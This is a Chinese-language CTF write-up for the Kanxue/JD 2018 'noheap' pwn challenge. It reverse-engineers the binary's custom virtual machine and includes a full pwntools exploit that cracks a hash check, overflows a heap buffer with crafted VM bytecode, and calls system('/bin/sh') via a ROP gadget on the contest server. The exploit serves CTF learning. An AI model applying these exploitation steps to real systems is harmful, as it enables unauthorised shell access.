-
-
[原创] 看雪.京东 2018CTF 第六题 PWN-noheap writeup
-
2018-6-27 21:13
-
1.先检查一下
所有保护全开。
2.反调试
int sub_E87()
{
puts(
" _____ _____ _____ _ __ __ _____ _____ ___ _____ \n"
"| _ \\ | ____| | _ \\ | | \\ \\ / / /___ \\ / _ \\ |_ | / _ \\ \n"
"| |_| | | |__ | | | | | | \\ \\/ / ___| | | | | | | | | |_| | \n"
"| ___/ | __| | | | | | | \\ / / ___/ | |/| | | | } _ { \n"
"| | | |___ | |_| | | | / / | |___ | |_| | | | | |_| | \n"
"|_| |_____| |_____/ |_| /_/ |_____| \\_____/ |_| \\_____/ \n");
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
alarm(0x3Cu); //这个影响调试 直接用90全patch掉
puts("Welcome !");
return puts("=======================================================================");
}3.第一关
unsigned __int64 sub_F0C()
{
unsigned __int8 buf; // [rsp+Fh] [rbp-51h]
unsigned int v2; // [rsp+10h] [rbp-50h]
int i; // [rsp+14h] [rbp-4Ch]
int fd; // [rsp+18h] [rbp-48h]
unsigned int v5; // [rsp+1Ch] [rbp-44h]
char s1[8]; // [rsp+20h] [rbp-40h]
char v7; // [rsp+28h] [rbp-38h]
char s2[8]; // [rsp+30h] [rbp-30h]
char v9; // [rsp+38h] [rbp-28h]
unsigned __int64 v10; // [rsp+48h] [rbp-18h]
v10 = __readfsqword(0x28u);
*(_QWORD *)s1 = 0LL;
v7 = 0;
*(_QWORD *)s2 = 0LL;
v9 = 0;
v2 = 0;
fd = open("/dev/urandom", 0);
for ( i = 0; i <= 3; ++i )
{
read(fd, &buf, 1uLL);
v2 = (v2 << 8) + buf % 0x2Bu + 48;
}
*(_DWORD *)s1 = sub_108A(&v2);
*(_DWORD *)&s1[4] = sub_108A(&v2);
v5 = sub_10B2(s1, 8LL);
printf("Hash:%08x\n", v5);
printf("Input:");
sub_14F0(s2, 9LL);
close(fd);
if ( strcmp(s1, s2) )
exit(0);
puts("=======================================================================");
return __readfsqword(0x28u) ^ v10;
}从/dev/urandom 循环读取四字节,通过一定运算组成一个DWORD数值v2.
通过函数
__int64 __fastcall sub_108A(unsigned int *a1)
{
*a1 = 214013 * *a1 + 2531011;
return *a1;
}构造一个8个字节的字符串。
IDA反编译的有点问题,其实第二次调用sub_108A时传入的事第一次调用的返回值。
接着利用sub_10b2计算一个hash,并输出出来。
__int64 __fastcall sub_10B2(unsigned __int8 *a1, int a2)
{
unsigned __int8 *v2; // rax
int v4; // [rsp+0h] [rbp-1Ch]
unsigned __int8 *v5; // [rsp+4h] [rbp-18h]
unsigned int v6; // [rsp+14h] [rbp-8h]
v5 = a1;
v4 = a2;
v6 = 0;
do
{
v2 = v5++;
v6 = 131 * v6 + *v2;
--v4;
}
while ( v4 > 0 );
return v6;
}再接着要求我们输入一个8字节的字符串,要求跟上边的s1一致。
这关只能爆破。
从v2的生成代码(v2 = (v2 << 8) + buf % 0x2Bu + 48;)可以看出,v2的每个字节都介于[48+0,48+0x2B)之间。
利用此特性,可获取到hash值之后,爆破出v2的值,进而获取到s1字符串。
爆破代码如下:
import struct
import binascii
import time
def time_me(fn):
def _wrapper(*args, **kwargs):
start = time.clock()
ret=fn(*args, **kwargs)
print "%s cost %s second"%(fn.__name__, time.clock() - start)
return ret
return _wrapper
def calc_1(v2):
return (214013*v2+2531011)&0xffffffff
def mk_string(v2):
v2_ret=calc_1(v2)
#print hex(v2_ret)
s=""
s+=struct.pack("I",v2_ret)
v2_ret=calc_1(v2_ret)
#print hex(v2_ret)
s+=struct.pack("I",v2_ret)
#print binascii.b2a_hex(s)
return s
def calc_2(v2_str):
#print "fuck"
v6=0
for x in v2_str:
v6=(0x83*v6+ord(x))&0xffffffff
#print hex(v6)
#print hex(v6)
return v6
def calc(v2):
v2_str=mk_string(v2)
v2_ret=calc_2(v2_str)
return v2_ret,v2_str
#print calc(0x5a314f44)
@time_me
def Crack(in_value):
ret_str=""
for i1 in range(0,0x2b):
for i2 in range(0,0x2b):
for i3 in range(0,0x2b):
for i4 in range(0,0x2b):
v2=((i1+0x30)<<24)+((i2+0x30)<<16)+((i3+0x30)<<8)+((i4+0x30))
#print hex(v2)
v2_ret,v2_str=calc(v2)
#print hex(i),v2_ret,v2_str
if v2_ret==in_value:
print v2_str,binascii.b2a_hex(v2_str)
ret_str=v2_str
break
return ret_str此算法爆破一个值大约需要7-10s.
4.第二关
__int64 sub_1470()
{
__int64 result; // rax
__int64 v1; // ST38_8
__int64 v2; // ST90_8
unsigned int v3; // [rsp+74h] [rbp-4h]
Menu_1591();
v3 = read_1547();
result = v3;
if ( v3 )
{
result = v3;
if ( v3 <= 3 )
{
v1 = qword_2030C0[~((unsigned __int8)v3 - 1LL) - 7] ^ qword_2030C0[~((unsigned __int8)v3 - 1LL) - 2];
v2 = qword_2030C0[-11] ^ qword_2030C0[-6];
JUMPOUT(__CS__, qword_2030C0[-7] ^ qword_2030C0[-12]);
}
}
return result;
}显示菜单并读取出来用户输入选项之后就会进入虚拟机。
虚拟机先不说,先说三个选项。
1.Malloc函数
主要的漏洞就在这个函数。
2.show
3.free
看完这三个函数,刚开始没有发现读取数据时会覆盖vm_code,还以为是house_of_force。https://ctf-wiki.github.io/ctf-wiki/pwn/heap/house_of_force/
但是此题中qword_203240处只能保存最后一次申请的空间,没办法形成此利用提交。
郁闷了好久想起来了之前的比赛,此题出题思路应该是跟 看雪.Wifi万能钥匙 2017CTF年中赛 第九题 Silence Server
https://ctf.pediy.com/game-fight-39.htm
是一样的似乎,要利用虚拟机进行操作。
虚拟机代码:
.text:00005574B3183107 sub_5574B3183107 proc near ; DATA XREF: sub_5574B3182CB5+FB↑o .text:00005574B3183107 .text:00005574B3183107 var_40= qword ptr -40h .text:00005574B3183107 var_38= qword ptr -38h .text:00005574B3183107 var_30= qword ptr -30h .text:00005574B3183107 var_28= qword ptr -28h .text:00005574B3183107 var_20= qword ptr -20h .text:00005574B3183107 var_18= qword ptr -18h .text:00005574B3183107 var_10= qword ptr -10h .text:00005574B3183107 var_8= qword ptr -8 .text:00005574B3183107 .text:00005574B3183107 mov [rbp+var_40], 0 .text:00005574B318310F mov [rbp+var_10], 0 .text:00005574B3183117 mov [rbp+var_30], 0 .text:00005574B318311F mov [rbp+var_8], 0 .text:00005574B3183127 mov [rbp+var_28], 0 .text:00005574B318312F mov [rbp+var_38], 0 .text:00005574B3183137 mov [rbp+var_20], 0 .text:00005574B318313F mov [rbp+var_18], 0 .text:00005574B3183147 .text:00005574B3183147 main_: ; CODE XREF: sub_5574B3183107:default1↓j .text:00005574B3183147 mov rdx, [rbp+var_40] ; rbp-40h vm_code[index] .text:00005574B318314B lea rax, vm_code .text:00005574B3183152 add rax, rdx .text:00005574B3183155 movzx eax, byte ptr [rax] .text:00005574B3183158 movsx rax, al .text:00005574B318315C mov [rbp+var_10], rax .text:00005574B3183160 cmp [rbp+var_10], 16h ; switch 23 cases .text:00005574B3183165 ja default ; jumptable 000000000000118E default case .text:00005574B318316B mov rax, [rbp+var_10] .text:00005574B318316F lea rdx, ds:0[rax*4] .text:00005574B3183177 lea rax, jump_table .text:00005574B318317E mov eax, [rdx+rax] .text:00005574B3183181 movsxd rdx, eax .text:00005574B3183184 lea rax, jump_table .text:00005574B318318B add rax, rdx .text:00005574B318318E jmp rax ; switch jump .text:00005574B3183190 ; --------------------------------------------------------------------------- .text:00005574B3183190 .text:00005574B3183190 case_1: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183190 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183190 mov rax, [rbp+var_40] ; jumptable 000000000000118E case 1 .text:00005574B3183194 lea rdx, [rax+1] .text:00005574B3183198 lea rax, vm_code .text:00005574B318319F add rax, rdx .text:00005574B31831A2 movzx eax, byte ptr [rax] .text:00005574B31831A5 movzx eax, al .text:00005574B31831A8 mov [rbp+var_30], rax ; .text:00005574B31831AC mov rax, [rbp+var_40] .text:00005574B31831B0 add rax, 2 .text:00005574B31831B4 mov [rbp+var_40], rax ; [rbp-40h]+=2 .text:00005574B31831B8 jmp default1 .text:00005574B31831BD ; --------------------------------------------------------------------------- .text:00005574B31831BD .text:00005574B31831BD case_2: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31831BD ; DATA XREF: .rodata:jump_table↓o .text:00005574B31831BD lea rdx, vm_code ; jumptable 000000000000118E case 2 .text:00005574B31831C4 mov rax, [rbp+var_30] .text:00005574B31831C8 add rax, rdx .text:00005574B31831CB movzx eax, byte ptr [rax] .text:00005574B31831CE movzx eax, al .text:00005574B31831D1 mov [rbp+var_28], rax ; .text:00005574B31831D5 mov rax, [rbp+var_40] .text:00005574B31831D9 add rax, 1 .text:00005574B31831DD mov [rbp+var_40], rax .text:00005574B31831E1 jmp default1 .text:00005574B31831E6 ; --------------------------------------------------------------------------- .text:00005574B31831E6 .text:00005574B31831E6 case_3: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31831E6 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31831E6 lea rdx, vm_code ; jumptable 000000000000118E case 3 .text:00005574B31831ED mov rax, [rbp+var_30] .text:00005574B31831F1 add rax, rdx .text:00005574B31831F4 mov rax, [rax] .text:00005574B31831F7 mov [rbp+var_38], rax .text:00005574B31831FB mov rax, [rbp+var_40] .text:00005574B31831FF add rax, 1 .text:00005574B3183203 mov [rbp+var_40], rax .text:00005574B3183207 jmp default1 .text:00005574B318320C ; --------------------------------------------------------------------------- .text:00005574B318320C .text:00005574B318320C case_4: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318320C ; DATA XREF: .rodata:jump_table↓o .text:00005574B318320C lea rdx, vm_code ; jumptable 000000000000118E case 4 .text:00005574B3183213 mov rax, [rbp+var_30] .text:00005574B3183217 add rax, rdx .text:00005574B318321A mov rax, [rax] .text:00005574B318321D mov [rbp+var_20], rax .text:00005574B3183221 mov rax, [rbp+var_40] .text:00005574B3183225 add rax, 1 .text:00005574B3183229 mov [rbp+var_40], rax .text:00005574B318322D jmp default1 .text:00005574B3183232 ; --------------------------------------------------------------------------- .text:00005574B3183232 .text:00005574B3183232 case_5: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183232 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183232 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 5 .text:00005574B3183236 sub rax, [rbp+var_20] .text:00005574B318323A mov [rbp+var_38], rax .text:00005574B318323E mov rax, [rbp+var_40] .text:00005574B3183242 add rax, 1 .text:00005574B3183246 mov [rbp+var_40], rax .text:00005574B318324A jmp default1 .text:00005574B318324F ; --------------------------------------------------------------------------- .text:00005574B318324F .text:00005574B318324F case_6: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318324F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318324F mov rdx, [rbp+var_38] ; jumptable 000000000000118E case 6 .text:00005574B3183253 mov rax, [rbp+var_20] .text:00005574B3183257 add rax, rdx .text:00005574B318325A mov [rbp+var_38], rax .text:00005574B318325E mov rax, [rbp+var_40] .text:00005574B3183262 add rax, 1 .text:00005574B3183266 mov [rbp+var_40], rax .text:00005574B318326A jmp default1 .text:00005574B318326F ; --------------------------------------------------------------------------- .text:00005574B318326F .text:00005574B318326F case_7: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318326F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318326F mov rax, [rbp+var_38] ; jumptable 000000000000118E case 7 .text:00005574B3183273 imul rax, [rbp+var_20] .text:00005574B3183278 mov [rbp+var_38], rax .text:00005574B318327C mov rax, [rbp+var_40] .text:00005574B3183280 add rax, 1 .text:00005574B3183284 mov [rbp+var_40], rax .text:00005574B3183288 jmp default1 .text:00005574B318328D ; --------------------------------------------------------------------------- .text:00005574B318328D .text:00005574B318328D case_8: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318328D ; DATA XREF: .rodata:jump_table↓o .text:00005574B318328D mov rax, [rbp+var_38] ; jumptable 000000000000118E case 8 .text:00005574B3183291 mov edx, 0 .text:00005574B3183296 div [rbp+var_20] .text:00005574B318329A mov [rbp+var_38], rax .text:00005574B318329E mov rax, [rbp+var_40] .text:00005574B31832A2 add rax, 1 .text:00005574B31832A6 mov [rbp+var_40], rax .text:00005574B31832AA jmp default1 .text:00005574B31832AF ; --------------------------------------------------------------------------- .text:00005574B31832AF .text:00005574B31832AF case_9: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832AF ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832AF mov rax, [rbp+var_38] ; jumptable 000000000000118E case 9 .text:00005574B31832B3 xor rax, [rbp+var_20] .text:00005574B31832B7 mov [rbp+var_38], rax .text:00005574B31832BB mov rax, [rbp+var_40] .text:00005574B31832BF add rax, 1 .text:00005574B31832C3 mov [rbp+var_40], rax .text:00005574B31832C7 jmp default1 .text:00005574B31832CC ; --------------------------------------------------------------------------- .text:00005574B31832CC .text:00005574B31832CC case_10: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832CC ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832CC mov rax, [rbp+var_38] ; jumptable 000000000000118E case 10 .text:00005574B31832D0 and rax, [rbp+var_20] .text:00005574B31832D4 mov [rbp+var_38], rax .text:00005574B31832D8 mov rax, [rbp+var_40] .text:00005574B31832DC add rax, 1 .text:00005574B31832E0 mov [rbp+var_40], rax .text:00005574B31832E4 jmp default1 .text:00005574B31832E9 ; --------------------------------------------------------------------------- .text:00005574B31832E9 .text:00005574B31832E9 case_11: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832E9 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832E9 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 11 .text:00005574B31832ED or rax, [rbp+var_20] .text:00005574B31832F1 mov [rbp+var_38], rax .text:00005574B31832F5 mov rax, [rbp+var_40] .text:00005574B31832F9 add rax, 1 .text:00005574B31832FD mov [rbp+var_40], rax .text:00005574B3183301 jmp default1 .text:00005574B3183306 ; --------------------------------------------------------------------------- .text:00005574B3183306 .text:00005574B3183306 case12: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183306 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183306 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 12 .text:00005574B318330A cmp rax, [rbp+var_20] .text:00005574B318330E jnz short loc_5574B318331A .text:00005574B3183310 mov [rbp+var_18], 0 .text:00005574B3183318 jmp short loc_5574B3183322 .text:00005574B318331A ; --------------------------------------------------------------------------- .text:00005574B318331A .text:00005574B318331A loc_5574B318331A: ; CODE XREF: sub_5574B3183107+207↑j .text:00005574B318331A mov [rbp+var_18], 1 .text:00005574B3183322 .text:00005574B3183322 loc_5574B3183322: ; CODE XREF: sub_5574B3183107+211↑j .text:00005574B3183322 mov rax, [rbp+var_40] .text:00005574B3183326 add rax, 1 .text:00005574B318332A mov [rbp+var_40], rax .text:00005574B318332E jmp default1 .text:00005574B3183333 ; --------------------------------------------------------------------------- .text:00005574B3183333 .text:00005574B3183333 case_13: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183333 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183333 cmp [rbp+var_18], 0 ; jumptable 000000000000118E case 13 .text:00005574B3183338 jnz short loc_5574B3183357 .text:00005574B318333A mov rdx, [rbp+var_40] .text:00005574B318333E lea rax, vm_code .text:00005574B3183345 add rax, rdx .text:00005574B3183348 movzx eax, byte ptr [rax] .text:00005574B318334B movzx eax, al .text:00005574B318334E mov [rbp+var_40], rax .text:00005574B3183352 jmp default1 .text:00005574B3183357 ; --------------------------------------------------------------------------- .text:00005574B3183357 .text:00005574B3183357 loc_5574B3183357: ; CODE XREF: sub_5574B3183107+231↑j .text:00005574B3183357 mov rax, [rbp+var_40] .text:00005574B318335B add rax, 2 .text:00005574B318335F mov [rbp+var_40], rax .text:00005574B3183363 jmp default1 .text:00005574B3183368 ; --------------------------------------------------------------------------- .text:00005574B3183368 .text:00005574B3183368 case_14: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183368 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183368 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 14 .text:00005574B318336C mov [rbp+var_38], rax .text:00005574B3183370 mov rax, [rbp+var_40] .text:00005574B3183374 add rax, 1 .text:00005574B3183378 mov [rbp+var_40], rax .text:00005574B318337C jmp default1 .text:00005574B3183381 ; --------------------------------------------------------------------------- .text:00005574B3183381 .text:00005574B3183381 case15: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183381 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183381 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 15 .text:00005574B3183385 mov [rbp+var_20], rax .text:00005574B3183389 mov rax, [rbp+var_40] .text:00005574B318338D add rax, 1 .text:00005574B3183391 mov [rbp+var_40], rax .text:00005574B3183395 jmp default1 .text:00005574B318339A ; --------------------------------------------------------------------------- .text:00005574B318339A .text:00005574B318339A case16: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318339A ; DATA XREF: .rodata:jump_table↓o .text:00005574B318339A mov rax, [rbp+var_38] ; jumptable 000000000000118E case 16 .text:00005574B318339E mov [rbp+var_28], rax .text:00005574B31833A2 mov rax, [rbp+var_40] .text:00005574B31833A6 add rax, 1 .text:00005574B31833AA mov [rbp+var_40], rax .text:00005574B31833AE jmp default1 .text:00005574B31833B3 ; --------------------------------------------------------------------------- .text:00005574B31833B3 .text:00005574B31833B3 case17: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833B3 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833B3 mov rax, [rbp+var_20] ; jumptable 000000000000118E case 17 .text:00005574B31833B7 mov [rbp+var_28], rax .text:00005574B31833BB mov rax, [rbp+var_40] .text:00005574B31833BF add rax, 1 .text:00005574B31833C3 mov [rbp+var_40], rax .text:00005574B31833C7 jmp default1 .text:00005574B31833CC ; --------------------------------------------------------------------------- .text:00005574B31833CC .text:00005574B31833CC case18: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833CC ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833CC mov rax, [rbp+var_20] ; jumptable 000000000000118E case 18 .text:00005574B31833D0 mov [rbp+var_38], rax .text:00005574B31833D4 mov rax, [rbp+var_40] .text:00005574B31833D8 add rax, 1 .text:00005574B31833DC mov [rbp+var_40], rax .text:00005574B31833E0 jmp default1 .text:00005574B31833E5 ; --------------------------------------------------------------------------- .text:00005574B31833E5 .text:00005574B31833E5 case19: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833E5 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833E5 mov rax, [rbp+var_30] ; jumptable 000000000000118E case 19 .text:00005574B31833E9 shl rax, 3 .text:00005574B31833ED neg rax .text:00005574B31833F0 mov rdx, rax .text:00005574B31833F3 lea rax, [rbp+var_40] .text:00005574B31833F7 add rax, rdx .text:00005574B31833FA mov rax, [rax] .text:00005574B31833FD mov [rbp+var_38], rax .text:00005574B3183401 mov rax, [rbp+var_40] .text:00005574B3183405 add rax, 1 .text:00005574B3183409 mov [rbp+var_40], rax .text:00005574B318340D jmp short default1 .text:00005574B318340F ; --------------------------------------------------------------------------- .text:00005574B318340F .text:00005574B318340F case20: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318340F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318340F mov rax, [rbp+var_30] ; jumptable 000000000000118E case 20 .text:00005574B3183413 shl rax, 3 .text:00005574B3183417 neg rax .text:00005574B318341A mov rdx, rax .text:00005574B318341D lea rax, [rbp+var_40] .text:00005574B3183421 add rdx, rax .text:00005574B3183424 mov rax, [rbp+var_38] .text:00005574B3183428 mov [rdx], rax .text:00005574B318342B mov rax, [rbp+var_40] .text:00005574B318342F add rax, 1 .text:00005574B3183433 mov [rbp+var_40], rax .text:00005574B3183437 jmp short default1 .text:00005574B3183439 ; --------------------------------------------------------------------------- .text:00005574B3183439 .text:00005574B3183439 case21: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183439 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183439 add [rbp+var_28], 1 ; jumptable 000000000000118E case 21 .text:00005574B318343E mov rax, [rbp+var_40] .text:00005574B3183442 add rax, 1 .text:00005574B3183446 mov [rbp+var_40], rax .text:00005574B318344A jmp short default1 .text:00005574B318344C ; --------------------------------------------------------------------------- .text:00005574B318344C .text:00005574B318344C case22: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318344C ; DATA XREF: .rodata:jump_table↓o .text:00005574B318344C mov rax, [rbp+var_40] ; jumptable 000000000000118E case 22 .text:00005574B3183450 add rax, 1 .text:00005574B3183454 mov [rbp+var_40], rax .text:00005574B3183458 mov rax, [rbp+var_38] .text:00005574B318345C jmp rax ; 跳add .text:00005574B318345E ; --------------------------------------------------------------------------- .text:00005574B318345E jmp short default1 .text:00005574B3183460 ; --------------------------------------------------------------------------- .text:00005574B3183460 .text:00005574B3183460 default: ; CODE XREF: sub_5574B3183107+5E↑j .text:00005574B3183460 ; sub_5574B3183107+87↑j .text:00005574B3183460 ; DATA XREF: ... .text:00005574B3183460 add rsp, 80h ; jumptable 000000000000118E default case .text:00005574B3183467 jmp short loc_5574B318346E .text:00005574B3183469 ; --------------------------------------------------------------------------- .text:00005574B3183469 .text:00005574B3183469 default1: ; CODE XREF: sub_5574B3183107+B1↑j .text:00005574B3183469 ; sub_5574B3183107+DA↑j ... .text:00005574B3183469 jmp main_ ; rbp-40h vm_code[index] .text:00005574B318346E ; --------------------------------------------------------------------------- .text:00005574B318346E .text:00005574B318346E loc_5574B318346E: ; CODE XREF: sub_5574B3183107+360↑j .text:00005574B318346E pop rbp .text:00005574B318346F retn .text:00005574B318346F ; } // starts at 5574B31830FE .text:00005574B318346F sub_5574B3183107 endp ; sp-analysis failed
整理之后的指令表。
栈中情况
利用思路:
1.第一次malloc的时候,size设为0,并将payload写入。
payload=‘A’*80+'0'*0xe+vm_code
第一部分只为填充
第二部分 是之前跳转到Malloc函数时已经执行的指令,这里随便可以是什么值
第三部分是从Malloc函数返回之后开始执行的vm_code
返回之后:
var_40 在00007FFC593372D0处
print函数地址在00007F616CA8A899处
var_40[-0x2d]处即是此值。
有了printf的地址,可利用vm代码计算出system地址和/bin/sh的地址。并把这两个值压栈。
最后根据var_40上边的malloc的地址
00007FFC593372C0 E4 85 50 67 B9 55 00 00
计算出rop跳板地址:
.text:000055B9675087E3 pop rdi .text:000055B9675087E4 retn
即可执行system("/bin/sh")
vm_code 布置如下:
#计算system地址 并压栈 01 2d :var_30=2d 13 :var_38=var_40[-var_30] var_38=printf_addr+99 01 27 :var_30=27 04 :var_20=vm_code[var_30] =0x0000000000010509 05 :var_38=var_38-var_20 var_38=system_addr 01 07 :var_30=07 14 :var_40[-var_30]=var_38 [rsp+8]=system_addr #计算/bin/sh字符串地址并压栈 01 2f :var_30=2f 04 :var_20=vm_code[var_30] =0x00000000001479c7 06 :var_38=var_38+var_20 var_38=binsh_str_addr 0108 :var_30=08 14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr #计算rop地址并跳转 01 02 :var_30=2 13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr 01 37 :var_30=37 04 :var_20=vm_code[var_30] =0x00000000000001ff 06 :var_38=var_38+var_20 var_38==rop_addr 16 :jmp var_38 local_system=0x45390 local_printf=0x55800 net_system=0x45390 net_printf=0x55800 0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509 c779140000000000:offset2 =system_addr-binsh_str_addr ff01000000000000:offset3 =rop_arrr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff
完整exp:
from pwn import *
import binascii
import time
import struct
g_local=False
context.log_level='debug'
import struct
import binascii
import time
def time_me(fn):
def _wrapper(*args, **kwargs):
start = time.clock()
ret=fn(*args, **kwargs)
print "%s cost %s second"%(fn.__name__, time.clock() - start)
return ret
return _wrapper
def calc_1(v2):
return (214013*v2+2531011)&0xffffffff
def mk_string(v2):
v2_ret=calc_1(v2)
#print hex(v2_ret)
s=""
s+=struct.pack("I",v2_ret)
v2_ret=calc_1(v2_ret)
#print hex(v2_ret)
s+=struct.pack("I",v2_ret)
#print binascii.b2a_hex(s)
return s
def calc_2(v2_str):
#print "fuck"
v6=0
for x in v2_str:
v6=(0x83*v6+ord(x))&0xffffffff
#print hex(v6)
#print hex(v6)
return v6
def calc(v2):
v2_str=mk_string(v2)
v2_ret=calc_2(v2_str)
return v2_ret,v2_str
#print calc(0x5a314f44)
@time_me
def Crack(in_value):
ret_str=""
for i1 in range(0,0x2b):
for i2 in range(0,0x2b):
for i3 in range(0,0x2b):
for i4 in range(0,0x2b):
v2=((i1+0x30)<<24)+((i2+0x30)<<16)+((i3+0x30)<<8)+((i4+0x30))
#print hex(v2)
v2_ret,v2_str=calc(v2)
#print hex(i),v2_ret,v2_str
if v2_ret==in_value:
print v2_str,binascii.b2a_hex(v2_str)
ret_str=v2_str
break
return ret_str
sh=0
if g_local:
sh=process("./noheap")
raw_input("ida has attch? Press any key for continue...")
else:
sh=remote("139.199.99.130",8989)
def get_hash(text):
#print text
index1=text.find("Hash:")
index2=text.find("\n",index1)
#print index1,index2
#print text[index1+5:index2]
return text[index1+5:index2]
def add(size,context):
sh.sendline("1")
print sh.recvuntil("Size :")
sh.sendline(str(size))
print sh.recvuntil("Content :")
sh.sendline(context)
#print sh.recv(0x200)
def free():
sh.sendline("3")
print sh.recv(200)
'''
012d :var_30=2d
13 :var_38=var_40[-var_30] var_38=printf_addr+99
0127 :var_30=27
04 :var_20=vm_code[var_30] =0x0000000000010509
05 :var_38=var_38-var_20 var_38=system_addr
0107 :var_30=07
14 :var_40[-var_30]=var_38 [rsp+8]=system_addr
012f :var_30=2f
04 :var_20=vm_code[var_30] =0x00000000001479c7
06 :var_38=var_38+var_20 var_38=binsh_str_addr
0108 :var_30=08
14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr
0102 :var_30=2
13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr
0137 :var_30=37
04 :var_20=vm_code[var_30] =0x00000000000001ff
06 :var_38=var_38+var_20 var_38==rop_addr
16 :jmp var_38
local_system=0x45390
local_printf=0x55800
net_system=0x45390
net_printf=0x55800
0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509
c779140000000000:offset2 =system_addr-binsh_str_addr
ff01000000000000:offset3 =rop_arrr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff
'''
vm_code ="\x01\x2d\x13\x01\x27\x04\x05\x01\x07\x14\x01\x2f\x04\x06\x01\x08\x14\x01\x02\x13\x01\x37\x04\x06\x16\x09\x05\x01\x00\x00\x00\x00\x00\xc7\x79\x14\x00\x00\x00\x00\x00\xff\x01\x00\x00\x00\x00\x00\x00"
def test():
wel_text=sh.recvuntil("Input:")
#print wel_text
hash_str=get_hash(wel_text)
#print "xxxxx",hash_str
#raw_input()
print("Crack hash.........")
str_input=Crack(int(hash_str,16))
print "input string",str_input
sh.sendline(str_input)
print sh.recv(200)
raw_input()
payload=""
payload+='A'*0x8e
payload+=vm_code
raw_input()
add(0, payload)
#add(16,"xxxxxxxxxxxxx")
sh.interactive()
test()
本地与服务器地址一致,直接运行即可:
此flag包含\n,只有全部复制粘贴才能提交成功,涉嫌违规。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2018-6-27 21:15
被lacoucou编辑
,原因:
|
|
|---|---|
